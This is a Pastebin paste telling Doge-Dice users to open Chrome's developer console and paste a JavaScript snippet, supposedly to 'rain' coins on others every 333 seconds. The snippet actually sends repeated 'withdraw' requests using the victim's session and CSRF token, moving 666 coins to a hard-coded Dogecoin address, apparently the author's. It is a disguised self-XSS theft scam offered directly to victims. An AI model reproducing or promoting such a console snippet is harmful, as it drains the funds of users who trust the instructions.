Advertisement
Nixsy

Untitled

Mar 21st, 2014
216
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. In Chrome web browser, press F12 and go to the console tab. Paste this and press enter to rain 666 coins from your Doge-Dice balance every 333 seconds (every 5 minutes, 33 seconds):
  2.  
  3. var rainAmount = '666';var rainIntervalSeconds = 333;var doRain = setInterval(function(){var rainRes = socket.emit('withdraw', csrf, 'DRainManMRNWvKcuj5mQZKbsK4L2CTbAxt', rainAmount, '')},rainIntervalSeconds * 1000);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement